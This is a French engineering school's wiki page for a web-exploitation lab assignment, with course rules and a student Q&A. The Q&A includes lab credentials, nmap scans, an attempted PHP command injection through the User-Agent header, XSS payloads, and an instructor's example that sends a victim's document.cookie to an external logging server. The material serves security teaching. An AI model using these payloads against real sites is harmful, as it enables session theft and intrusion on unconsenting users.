5MMMSI-2011-2012-practical assessment-web exploitations and basic risk analysis

De Ensiwiki
Aller à : navigation, rechercher

Fraud

We kindly remind your that Ensimag enforces strict rules regarding frauding (See charte d’utilisation du matériel informatique).

Teachers might use automatic fraud detection tools to observe suspect similarities between deliverables. Each proven fraud will entail that several groups will get a 0/20 mark at the practical assessment, without any 2nd session possibility. Teachers will not try to understand which group did copy and which one did not.

Recidivism will be punished in conformance to the student rules (règlement des études).

Introduction

Rules

  • each GI student has to be with 1 Ensimag student
  • each LOAD with 1 GI or SIF
  • persons per group: 2 ; form your groups on TEIDE ; no bonus point will be granted if a group only has 1 student
  • practical assessment due on TEIDE

Fraud

We kindly remind your that Ensimag enforces strict rules regarding frauding (See charte d’utilisation du matériel informatique).

Teachers might use automatic fraud detection tools to observe suspect similarities between deliverables. Each proven fraud will entail that several groups will get a 0/20 mark at the practical assessment, without any 2nd session possibility. Teachers will not try to understand which group did copy and which one did not.

Recidivism will be punished in conformance to the student rules (règlement des études).

Requirement

ensi;qg)student

Practical assessment paper

Fichier:5MMSSI-2011-2012-TP2-web exploitation and basic risk analysis.pdf

Questions

In case you do experience some difficulty with the assessment, please ask your question here, and then also send it by email to Fabien and Karim.

Answered questions

  • Utilisateur:duchenef: how do we ask a question for that assessment?
    • Utilisateur:duchenef Answer: please write your question by copying and adapting the lines after the "Unanswered Section"
    • also please send an email to Karim and Fabien with the exact same text as the one you wrote on that page


  • the keyboard mapping is not QWERTY? thus at the logon prompt, ensimag-student / ensimag-student does not work
    • Warning: i forgot to change the keyboard mapping (I am used to type in QWERTY..). Thus, at the first logon screen, in case you are using an AZERTY keyboard, please type
username:  ensi,qg)student
password: ensi,qg)student

  • Using
 
/pentest/enumeration/web/whatweb$ ./whatweb localhost
...
> http://localhost/ex1/ ERROR: Not HTTP or cannot resolve hostname

# to set the keyboard layout to azerty
setxkbmap fr
# ... US qwerty
setxkbmap us

Also have a look at http://www.wikihow.com/Change-Keyboard-Layout-in-Ubuntu


  • Utilisateur:dietricj after configuring Firefox, Burp doesn't intercept the requests from Firefox (we have set it as shown on the paper). Anyone with the same problem ?
    • Utilisateur:duchenef answer: you will also have to configure the following values:
      • network.proxy.ssl 127.0.0.1
      • network.proxy.ssl_port 8080
      • network.proxy.type 1

nmap -A 127.0.0.1 

as a unprivileged user with success. you could also run

nmap -A --unprivileged 127.0.0.1

but this is unnecessary on the platform I did provide you... Maybe you are trying to run

 
nmap -O --unprivileged 127.0.0.1
TCP/IP fingerprinting (for OS scan) requires root privileges.
QUITTING!

In which case I agree. But keep going, nmap -A provides you enough information at that stage.


En effet j'ai essayé sur Live http header REPLAY: 1.

http://localhost/../easter-eggs/ex0-secret.b64

Forbidden 430
    • user:duchenef: effectivement, on ne peut y acceder directement depuis l'URL (ie en manipulant le parametre d'entree de la methode HTTP GET)

2.

GET http://localhost
..
User Agent <?php system('GET http://localhost/easter-eggs/ex0-secret.b64 > http://localhost'); ?>

Cela ne marche pas non plus

    • user:duchenef: OK, vous avez donc essaye de manipuler le parametre d'entre User-Agent. Bien essaye, mais puisque vos tests semblent infructueux, je vous conseille de regarder une autre variable d'entree. Un indice: il y a un drapeau sur la page de pedro pizza...

3.

HTTP/1.1 200 OK
Date: Tue, 20 Mar 2012 16:26:31 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 28 Jan 2009 23:24:04 GMT
Etag: "102b15-d01b-46193447d6d00"
Accept-Ranges: bytes
..

J'ai repris le ETAG sur cette réponse pour se faire passer pour la source:

GET http://localhost
..
Authorization: Basic : 102b15-d01b-46193447d6d00

Pouvez vous me donner une indication? doit-on s'identifier pour accéder à la page visée? doit-on casser un password ou y accéder par ../../?

Merci,

    • user:duchenef: dans ce tp, il n'y a pas d'attaque sur l'indice du cache, donc ne pas se focaliser sur ce parametre d'entree.

  • user:soutorid: L'autre question est sur le TP, sur le exercice de XSS(4.2) J'ai vu qui la web page c'est vulnerable à attaques de ce type parce que je peux ajouter code à le code source de la page, mais comment est-ce que je peux voler la cookie?
    • user:duchenef: le fait de voler le(s) cookie(s) relatif au FQDN + IP du serveur auquel la victime se connecte est un exemple de payload JavaScript. Les possibilités sont multiples, par exemple, dans le MISC HS 4 (Oct/Nov 2011), HB et Renaud Bidou ont expliqué les bases d'un botnet XSS ;)

Pour en revenir a la question initiale, il faut appeler l'interpréteur JavaScript (ceci peut se faire

  • sur les attributs d'évèments :
<IMG onerror="javascript:alert(1337);" ... />
  • tag HTML script:
<input ... /> <script> alert(1337); </script>

pour afficher le cookie, vous pouvez vous contenter de faire un

alert(document.cookie);
  • une methode marrante est d'envoyer la valeur du cookie sur un serveur HTTP distant qui enregistre toutes les requetes. un exemple:
document.location='http://car-online.fr/en/CTF-tools/store_get_args/?cookie_victime='+document.cookie;




Unanswered questions